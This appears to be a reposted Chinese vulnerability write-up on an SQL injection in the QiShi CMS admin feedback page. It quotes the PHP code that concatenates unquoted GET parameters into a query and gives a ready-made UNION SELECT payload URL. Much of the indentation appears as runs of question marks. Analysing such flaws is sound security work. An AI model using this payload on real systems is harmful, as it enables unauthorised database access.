鸿 网 互 联 www.68idc.cn

骑士CMS后台SQL注入

来源:互联网 作者:佚名 时间:2017-08-18 11:13
漏洞文件:admin/admin_feedback.php 代码82行: ???????? if (!empty($_GET['reporttype']))???????? {?????????????????? $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];

漏洞文件:admin/admin_feedback.php

代码82行:

???????? if (!empty($_GET['reporttype']))

???????? {

?????????????????? $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];

???????? }

???????? if (!empty($_GET['audit']))

???????? {

?????????????????? $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];

???????? }

???????? $total_val=$db->get_total($total_sql);

???????? $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));

???????? $currenpage=$page->nowindex;

???????? $offset=($currenpage-1)*$perpage;

???????? $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);

???????? $smarty->assign('pageheader',"举报信息");

???????? $smarty->assign('list',$list);

???????? $smarty->assign('page',$page->show(3));

 

跟下get_report_list:

 

function get_report_list($offset,$perpage,$get_sql= '',$type)

{

??? global $db;

??? $limit=" LIMIT ".$offset.','.$perpage;

??? if($type==1){

?????? $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);

?????? while($row = $db->fetch_array($result))

?????? {

?????? $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));

?????? $row_arr[] = $row;

?????? }

??? }else{

?????? $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);

?????? while($row = $db->fetch_array($result))

?????? {

?????? $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));

?????? $row_arr[] = $row;

??? ??? }

??? }



??? return $row_arr;

}

 

$_GET['reporttype']

$_GET['audit']

没有’包含。

 

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23

1

网友评论
<